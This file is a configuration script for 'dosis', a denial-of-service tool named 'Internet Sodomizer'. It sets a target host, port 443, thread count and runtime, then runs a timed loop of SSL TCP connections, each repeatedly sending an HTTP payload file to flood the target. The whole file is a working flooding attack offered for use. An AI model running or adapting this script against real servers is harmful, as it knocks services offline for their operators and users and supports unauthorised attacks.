###############################################################################
# https.inj
#
# HTTPS TCP connections.
#
# Configuration:
#  THOST   - target host address
#  TPORT   - target host port
#  THREADS - number of threads
#  RT      - total runtime (in seconds)
#
#   NOTE: vars declared previously as environment variables won't be
#         overwritten by script values. If you want that values on script take
#         precedence over env vars, remove the preceeding ?.
#
# -----------------------------------------------------------------------------
# dosis - DoS: Internet Sodomizer
#   (C) 2008-2009 Gerardo García Peña <gerardo@kung-foo.net>
#
#   This program is free software; you can redistribute it and/or modify it
#   under the terms of the GNU General Public License as published by the Free
#   Software Foundation; either version 2 of the License, or (at your option)
#   any later version.
#
#   This program is distributed in the hope that it will be useful, but WITHOUT
#   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
#   FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
#   more details.
#
#   You should have received a copy of the GNU General Public License along
#   with this program; if not, write to the Free Software Foundation, Inc., 51
#   Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
#
###############################################################################

# configuration
? THOST="127.0.0.1"
? TPORT="443"
? THREADS="10"
? RT="10.0"

# thread debug mode: if you enable the DEBUG flag in TCP connections you can
# see the data received from the target.
#DBG="ENABLED"
DBG="FALSE"

# script
0.0 ON [1%$THREADS] TCP SSL CIPHER "DES-CBC3-SHA" DEBUG $DBG DST $THOST $TPORT PAYLOAD FILE("http.payload") PERIODIC [ 1.0 ]
$RT OFF *

